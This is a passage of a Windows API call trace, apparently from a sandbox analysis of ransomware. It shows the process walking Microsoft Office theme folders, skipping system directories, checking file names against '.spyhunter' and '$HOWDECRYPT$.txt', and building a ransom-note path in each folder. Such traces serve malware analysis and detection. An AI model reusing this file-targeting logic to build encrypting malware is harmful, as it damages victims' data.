lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.553] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.553] lstrlenW (lpString="Windows") returned 7 [0090.553] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.553] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.553] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.554] lstrlenW (lpString="System Volume Information") returned 25 [0090.554] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\.") returned 69 [0090.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.554] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.554] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.554] lstrlenW (lpString="Windows") returned 7 [0090.554] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.554] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.554] lstrlenW (lpString="System Volume Information") returned 25 [0090.554] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\..") returned 70 [0090.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.554] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.554] lstrcmpiW (lpString1="JOURNAL.ELM", lpString2="Windows") returned -1 [0090.554] lstrlenW (lpString="Windows") returned 7 [0090.554] lstrcmpiW (lpString1="JOURNAL.ELM", lpString2="$Recycle.bin") returned 1 [0090.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.554] lstrcmpiW (lpString1="JOURNAL.ELM", lpString2="System Volume Information") returned -1 [0090.554] lstrlenW (lpString="System Volume Information") returned 25 [0090.554] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0090.554] StrStrIW (lpFirst="JOURNAL.ELM", lpSrch=".spyhunter") returned 0x0 [0090.554] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.554] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="_uninstalling_.png") returned 1 [0090.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0090.555] GetProcessHeap () returned 0x2c0000 [0090.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37fc20 [0090.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1148) returned 0x3824f8 [0090.555] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.555] lstrcmpiW (lpString1="JOURNAL.INF", lpString2="Windows") returned -1 [0090.555] lstrlenW (lpString="Windows") returned 7 [0090.555] lstrcmpiW (lpString1="JOURNAL.INF", lpString2="$Recycle.bin") returned 1 [0090.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.555] lstrcmpiW (lpString1="JOURNAL.INF", lpString2="System Volume Information") returned -1 [0090.555] lstrlenW (lpString="System Volume Information") returned 25 [0090.555] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0090.555] StrStrIW (lpFirst="JOURNAL.INF", lpSrch=".spyhunter") returned 0x0 [0090.555] lstrcmpW (lpString1="JOURNAL.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.555] lstrcmpW (lpString1="JOURNAL.INF", lpString2="_uninstalling_.png") returned 1 [0090.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0090.555] GetProcessHeap () returned 0x2c0000 [0090.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37fd08 [0090.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1150) returned 0x3824f8 [0090.555] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.555] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.555] lstrlenW (lpString="Windows") returned 7 [0090.555] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.555] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.556] lstrlenW (lpString="System Volume Information") returned 25 [0090.556] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0090.556] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.556] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.556] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0090.556] GetProcessHeap () returned 0x2c0000 [0090.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37fdf0 [0090.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1158) returned 0x3824f8 [0090.556] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.556] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.556] lstrlenW (lpString="Windows") returned 7 [0090.556] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.556] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.556] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.556] lstrlenW (lpString="System Volume Information") returned 25 [0090.556] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0090.556] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.556] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.556] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0090.556] GetProcessHeap () returned 0x2c0000 [0090.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3412d0 [0090.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1160) returned 0x3824f8 [0090.556] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.557] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.557] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\$HOWDECRYPT$.txt") returned 84 [0090.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\$HOWDECRYPT$.txt") returned 84 [0090.557] GetProcessHeap () returned 0x2c0000 [0090.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354ce8 [0090.557] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1168) returned 0x3824f8 [0090.557] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.557] lstrcmpiW (lpString1="LAYERS", lpString2="Windows") returned -1 [0090.557] lstrlenW (lpString="Windows") returned 7 [0090.557] lstrcmpiW (lpString1="LAYERS", lpString2="$Recycle.bin") returned 1 [0090.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.557] lstrcmpiW (lpString1="LAYERS", lpString2="System Volume Information") returned -1 [0090.557] lstrlenW (lpString="System Volume Information") returned 25 [0090.557] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned 66 [0090.557] lstrcmpW (lpString1="LAYERS", lpString2=".") returned 1 [0090.557] lstrcmpW (lpString1="LAYERS", lpString2="..") returned 1 [0090.557] GetProcessHeap () returned 0x2c0000 [0090.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.557] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*") returned 68 [0090.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.596] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.596] lstrlenW (lpString="Windows") returned 7 [0090.596] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.596] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.596] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.596] lstrlenW (lpString="System Volume Information") returned 25 [0090.596] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\.") returned 68 [0090.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.596] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.596] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.597] lstrlenW (lpString="Windows") returned 7 [0090.597] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.597] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.597] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.597] lstrlenW (lpString="System Volume Information") returned 25 [0090.597] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\..") returned 69 [0090.597] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.597] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.597] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.597] lstrcmpiW (lpString1="LAYERS.ELM", lpString2="Windows") returned -1 [0090.597] lstrlenW (lpString="Windows") returned 7 [0090.597] lstrcmpiW (lpString1="LAYERS.ELM", lpString2="$Recycle.bin") returned 1 [0090.597] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.597] lstrcmpiW (lpString1="LAYERS.ELM", lpString2="System Volume Information") returned -1 [0090.597] lstrlenW (lpString="System Volume Information") returned 25 [0090.597] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0090.597] StrStrIW (lpFirst="LAYERS.ELM", lpSrch=".spyhunter") returned 0x0 [0090.597] lstrcmpW (lpString1="LAYERS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.597] lstrcmpW (lpString1="LAYERS.ELM", lpString2="_uninstalling_.png") returned 1 [0090.597] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0090.597] GetProcessHeap () returned 0x2c0000 [0090.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x375268 [0090.597] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1150) returned 0x3824f8 [0090.597] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.597] lstrcmpiW (lpString1="LAYERS.INF", lpString2="Windows") returned -1 [0090.597] lstrlenW (lpString="Windows") returned 7 [0090.597] lstrcmpiW (lpString1="LAYERS.INF", lpString2="$Recycle.bin") returned 1 [0090.597] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.598] lstrcmpiW (lpString1="LAYERS.INF", lpString2="System Volume Information") returned -1 [0090.598] lstrlenW (lpString="System Volume Information") returned 25 [0090.598] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") returned 77 [0090.598] StrStrIW (lpFirst="LAYERS.INF", lpSrch=".spyhunter") returned 0x0 [0090.598] lstrcmpW (lpString1="LAYERS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.598] lstrcmpW (lpString1="LAYERS.INF", lpString2="_uninstalling_.png") returned 1 [0090.598] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") returned 77 [0090.598] GetProcessHeap () returned 0x2c0000 [0090.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x37fed8 [0090.598] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1158) returned 0x3824f8 [0090.598] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.598] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.598] lstrlenW (lpString="Windows") returned 7 [0090.598] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.598] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.598] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.598] lstrlenW (lpString="System Volume Information") returned 25 [0090.598] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0090.598] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.598] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.598] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.598] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0090.598] GetProcessHeap () returned 0x2c0000 [0090.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x37ffc0 [0090.598] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1160) returned 0x3824f8 [0090.598] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.598] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.599] lstrlenW (lpString="Windows") returned 7 [0090.599] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.599] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.599] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.599] lstrlenW (lpString="System Volume Information") returned 25 [0090.599] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0090.599] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.599] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.599] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.599] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\THMBNAIL.PNG") returned 79 [0090.599] GetProcessHeap () returned 0x2c0000 [0090.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3800a8 [0090.599] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1168) returned 0x3824f8 [0090.599] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.599] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.599] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\$HOWDECRYPT$.txt") returned 83 [0090.599] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\$HOWDECRYPT$.txt") returned 83 [0090.599] GetProcessHeap () returned 0x2c0000 [0090.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3411e0 [0090.599] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1170) returned 0x3824f8 [0090.600] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.600] lstrcmpiW (lpString1="LEVEL", lpString2="Windows") returned -1 [0090.600] lstrlenW (lpString="Windows") returned 7 [0090.600] lstrcmpiW (lpString1="LEVEL", lpString2="$Recycle.bin") returned 1 [0090.600] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.600] lstrcmpiW (lpString1="LEVEL", lpString2="System Volume Information") returned -1 [0090.600] lstrlenW (lpString="System Volume Information") returned 25 [0090.600] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned 65 [0090.600] lstrcmpW (lpString1="LEVEL", lpString2=".") returned 1 [0090.600] lstrcmpW (lpString1="LEVEL", lpString2="..") returned 1 [0090.600] GetProcessHeap () returned 0x2c0000 [0090.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.600] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*") returned 67 [0090.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.601] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.601] lstrlenW (lpString="Windows") returned 7 [0090.601] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.601] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.601] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.601] lstrlenW (lpString="System Volume Information") returned 25 [0090.601] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\.") returned 67 [0090.601] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.601] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.601] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.601] lstrlenW (lpString="Windows") returned 7 [0090.601] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.601] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.601] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.601] lstrlenW (lpString="System Volume Information") returned 25 [0090.601] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\..") returned 68 [0090.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.601] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.601] lstrcmpiW (lpString1="LEVEL.ELM", lpString2="Windows") returned -1 [0090.601] lstrlenW (lpString="Windows") returned 7 [0090.601] lstrcmpiW (lpString1="LEVEL.ELM", lpString2="$Recycle.bin") returned 1 [0090.601] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.602] lstrcmpiW (lpString1="LEVEL.ELM", lpString2="System Volume Information") returned -1 [0090.602] lstrlenW (lpString="System Volume Information") returned 25 [0090.602] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0090.602] StrStrIW (lpFirst="LEVEL.ELM", lpSrch=".spyhunter") returned 0x0 [0090.602] lstrcmpW (lpString1="LEVEL.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.602] lstrcmpW (lpString1="LEVEL.ELM", lpString2="_uninstalling_.png") returned 1 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.ELM") returned 75 [0090.602] GetProcessHeap () returned 0x2c0000 [0090.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345928 [0090.602] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1178) returned 0x3824f8 [0090.602] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.602] lstrcmpiW (lpString1="LEVEL.INF", lpString2="Windows") returned -1 [0090.602] lstrlenW (lpString="Windows") returned 7 [0090.602] lstrcmpiW (lpString1="LEVEL.INF", lpString2="$Recycle.bin") returned 1 [0090.602] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.602] lstrcmpiW (lpString1="LEVEL.INF", lpString2="System Volume Information") returned -1 [0090.602] lstrlenW (lpString="System Volume Information") returned 25 [0090.602] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0090.602] StrStrIW (lpFirst="LEVEL.INF", lpSrch=".spyhunter") returned 0x0 [0090.602] lstrcmpW (lpString1="LEVEL.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.602] lstrcmpW (lpString1="LEVEL.INF", lpString2="_uninstalling_.png") returned 1 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\LEVEL.INF") returned 75 [0090.602] GetProcessHeap () returned 0x2c0000 [0090.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345a08 [0090.602] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1180) returned 0x3824f8 [0090.603] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.603] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.603] lstrlenW (lpString="Windows") returned 7 [0090.603] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.603] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.603] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.603] lstrlenW (lpString="System Volume Information") returned 25 [0090.603] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0090.603] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.603] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.603] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 77 [0090.603] GetProcessHeap () returned 0x2c0000 [0090.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380190 [0090.603] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1188) returned 0x3824f8 [0090.603] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.603] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.603] lstrlenW (lpString="Windows") returned 7 [0090.603] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.603] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.603] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.603] lstrlenW (lpString="System Volume Information") returned 25 [0090.603] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0090.603] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.603] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.603] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 78 [0090.603] GetProcessHeap () returned 0x2c0000 [0090.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x380278 [0090.604] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1190) returned 0x3824f8 [0090.604] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.604] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.604] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\$HOWDECRYPT$.txt") returned 82 [0090.604] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\$HOWDECRYPT$.txt") returned 82 [0090.604] GetProcessHeap () returned 0x2c0000 [0090.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x3413c0 [0090.604] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1198) returned 0x3824f8 [0090.605] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: 